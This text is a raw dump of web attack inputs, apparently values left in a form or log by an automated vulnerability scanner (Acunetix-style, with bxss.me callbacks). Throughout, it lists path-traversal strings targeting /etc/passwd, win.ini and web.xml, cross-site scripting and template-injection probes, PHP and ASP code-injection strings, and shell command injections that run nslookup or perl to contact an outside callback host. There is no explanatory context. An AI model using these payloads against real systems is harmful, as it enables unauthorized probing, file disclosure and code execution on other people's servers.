unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
WEB-INF/web.xml
WEB-INF\web.xml
1'"()&%4b64(9416)
'"()&%4b64(9284)
19219911
acu7324%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7324
acux3684%C0%BEz1%C0%BCz2a%90bcxuca3684
1
1
1}}"}}'}}1%>"%>'%>
1
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
14b64(9908)
1YZPAL[!+!]
14b64(9273)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%34%62%36%34%28%39%34%39%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
14b64(9460)
1
14b64(9809)
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%34%62%36%34%289686%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\4b64(9015)\u003C/sCripT\u003E
1<ScRiPt>4b64(9734)</sCripT>
?
1
1}body{acu:Expre/**/SSion(4b64(9620))}
1
1cVEqF
4b64(9328)
1NLYIN[!+!]
1
1
1
1
1'"()&%g80y(9413)
'"()&%g80y(9945)
19978001
acu10688%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca10688
acux4008%C0%BEz1%C0%BCz2a%90bcxuca4008
1
1
1}}"}}'}}1%>"%>'%>
1
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1g80y(9587)
19PJCC[!+!]
1g80y(9101)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%67%38%30%79%28%39%31%35%36%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1g80y(9516)
1
1g80y(9331)
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%67%38%30%79%289964%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\g80y(9745)\u003C/sCripT\u003E
1<ScRiPt>g80y(9081)</sCripT>
?
1
1}body{acu:Expre/**/SSion(g80y(9768))}
1
1kvTdx
g80y(9537)
1U8FB3[!+!]
1
1
1
1
1'"()&%wq3Q(9476)
'"()&%wq3Q(9982)
19927059
acu2343%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca2343
acux10824%C0%BEz1%C0%BCz2a%90bcxuca10824
1
1
1}}"}}'}}1%>"%>'%>
1
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1wq3Q(9293)
1TWTSJ[!+!]
1wq3Q(9587)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%77%71%33%51%28%39%38%39%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1wq3Q(9645)
1
1wq3Q(9921)
1
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%77%71%33%51%289294%29%3C%2F%73%43%72%69%70%54%3E
1\u003CScRiPt\wq3Q(9771)\u003C/sCripT\u003E
1<ScRiPt>wq3Q(9434)</sCripT>
?
1
1}body{acu:Expre/**/SSion(wq3Q(9221))}
1
18D1gR
wq3Q(9703)
1DUKBN[!+!]
1
1
1
1
1
1'"()&%Mo87(9655)
1'"()&%bGI2(9819)
'"()&%Mo87(9115)
'"()&%bGI2(9811)
19272709
19661569
acu7949%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca7949
acu4223%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca4223
acux9645%C0%BEz1%C0%BCz2a%90bcxuca9645
acux4641%C0%BEz1%C0%BCz2a%90bcxuca4641
1
1
1
1
1}}"}}'}}1%>"%>'%>
1}}"}}'}}1%>"%>'%>
1
1
acx{{98991*97996}}xca
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1Mo87(9389)
1bGI2(9103)
16GBSP[!+!]
1Mo87(9067)
1BKZTK[!+!]
1bGI2(9593)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%62%47%49%32%28%39%31%34%32%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%4D%6F%38%37%28%39%35%31%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1Mo87(9316)
1bGI2(9280)
1
1Mo87(9831)
1
1bGI2(9623)
&n964300=v992462
1
1
${10000409+10000234}
'.gethostbyname(lc('hitsp'.'vpkcvhyiaf59a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(72).chr(105).chr(87).'
1
F5qeSIbs
1
".gethostbyname(lc("hitls"."ngmrnxbld2852.bxss.me."))."A".chr(67).chr(hex("58")).chr(121).chr(85).chr(112).chr(74)."
1
1
1
"+"A".concat(70-3).concat(22*4).concat(121).concat(69).concat(120).concat(87)+(require"socket" Socket.gethostbyname("hitst"+"jjpzxelta89b5.bxss.me.")[3].to_s)+"
1'"()&%lVBg(9285)
1
'+'A'.concat(70-3).concat(22*4).concat(115).concat(65).concat(103).concat(85)+(require'socket' Socket.gethostbyname('hitwy'+'yhimxzuf5d3ba.bxss.me.')[3].to_s)+'
'"()&%lVBg(9056)
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
1D3bKysnlAO
1
1
19282328
HttP://bxss.me/t/xss.html?%00
1
bxss.me/t/xss.html?%00
1
1
1
1
acu9163%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca9163
'"
acux5338%C0%BEz1%C0%BCz2a%90bcxuca5338
acux5338%C0%BEz1%C0%BCz2a%90bcxuca5338
response.write(9232664*9766307)
)
'+response.write(9232664*9766307)+'
!(()&&!|*|*|
!(()&&!|*|*|
1
'+response.write(9232664*9766307)+'
^(#$!@#$)(()))******
"+response.write(9232664*9766307)+"
"+response.write(9232664*9766307)+"
1
1}}"}}'}}1%>"%>'%>
1
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
1lVBg(9776)
http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg
1some_inexistent_file_with_long_name%00.jpg
1D9IKH[!+!]
Http://bxss.me/t/fit.txt
1lVBg(9174)
http://bxss.me/t/fit.txt%3F.jpg
bxss.me
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6C%56%42%67%28%39%34%30%39%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
1lVBg(9463)
';print(md5(31337));$a='
";print(md5(31337));$a="
1
1
${@print(md5(31337))}
${@print(md5(31337))}\
1lVBg(9247)
'.print(md5(31337)).'
1
1
1
1
1
1
1
%31%3C%53%63%52%69%50%74%20%3E%6C%56%42%67%289294%29%3C%2F%73%43%72%69%70%54%3E
echo pzsysb$()\ pzoxvx\nz^xyu||a #' &echo pzsysb$()\ pzoxvx\nz^xyu||a #|" &echo pzsysb$()\ pzoxvx\nz^xyu||a #
1\u003CScRiPt\lVBg(9458)\u003C/sCripT\u003E
&echo ffwmwo$()\ khhxbf\nz^xyu||a #' &echo ffwmwo$()\ khhxbf\nz^xyu||a #|" &echo ffwmwo$()\ khhxbf\nz^xyu||a #
|echo estwtk$()\ dmrsxz\nz^xyu||a #' |echo estwtk$()\ dmrsxz\nz^xyu||a #|" |echo estwtk$()\ dmrsxz\nz^xyu||a #
1<ScRiPt>lVBg(9636)</sCripT>
(nslookup hitzvttzitgrx4988a.bxss.me||perl -e "gethostbyname('hitzvttzitgrx4988a.bxss.me')")
../../../../../../../../../../../../../../etc/passwd
?
$(nslookup hitsicdfjbgdjd076a.bxss.me||perl -e "gethostbyname('hitsicdfjbgdjd076a.bxss.me')")
$(nslookup hitsicdfjbgdjd076a.bxss.me||perl -e "gethostbyname('hitsicdfjbgdjd076a.bxss.me')")
?
../../../../../../../../../../../../../../windows/win.ini
?
$(nslookup hitsicdfjbgdjd076a.bxss.me||perl -e "gethostbyname('hitsicdfjbgdjd076a.bxss.me')")
&(nslookup hitmqntrlilrv29df2.bxss.me||perl -e "gethostbyname('hitmqntrlilrv29df2.bxss.me')")&'\"`0&(nslookup hitmqntrlilrv29df2.bxss.me||perl -e "gethostbyname('hitmqntrlilrv29df2.bxss.me')")&`'
../../../../../../../../../../../../../../../proc/version
1
|(nslookup hittfjapnveuufdb6c.bxss.me||perl -e "gethostbyname('hittfjapnveuufdb6c.bxss.me')")
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
`(nslookup hitcwtjjxlzxaa4277.bxss.me||perl -e "gethostbyname('hitcwtjjxlzxaa4277.bxss.me')")`
;(nslookup hitcrcgkwsspg9f61e.bxss.me||perl -e "gethostbyname('hitcrcgkwsspg9f61e.bxss.me')")|(nslookup hitcrcgkwsspg9f61e.bxss.me||perl -e "gethostbyname('hitcrcgkwsspg9f61e.bxss.me')")&(nslookup hitcrcgkwsspg9f61e.bxss.me||perl -e "gethostbyname('hitcrcgkwsspg9f61e.bxss.me')")
../../../../../../../../../../etc/passwd%00.jpg
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
1}body{acu:Expre/**/SSion(lVBg(9281))}
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
/etc/passwd
1
/xfs.bxss.me
955448
%2fetc%2fpasswd
http://xfs.bxss.me
1brJZU
lVBg(9880)
/.././.././.././.././.././.././.././../etc/./passwd%00
1X2KIV[!+!]
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
//xfs.bxss.me
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
1
../././../././../././../././../././../././../././../././../././../././etc/passwd
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
1
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
file:///etc/passwd
1
/\xfs.bxss.me
/\../\../\../\../\../\../\../etc/passwd
1
/WEB-INF/web.xml
C:\WINDOWS\system32\drivers\etc\hosts
../../../../../../../../../../windows/win.ini%00.jpg
/../../../../../../../../../../boot.ini
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
..\..\..\..\..\..\..\..\windows\win.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
WEB-INF/web.xml
WEB-INF\web.xml
1'"()&%y3SD(9885)
'"()&%y3SD(9851)
19176644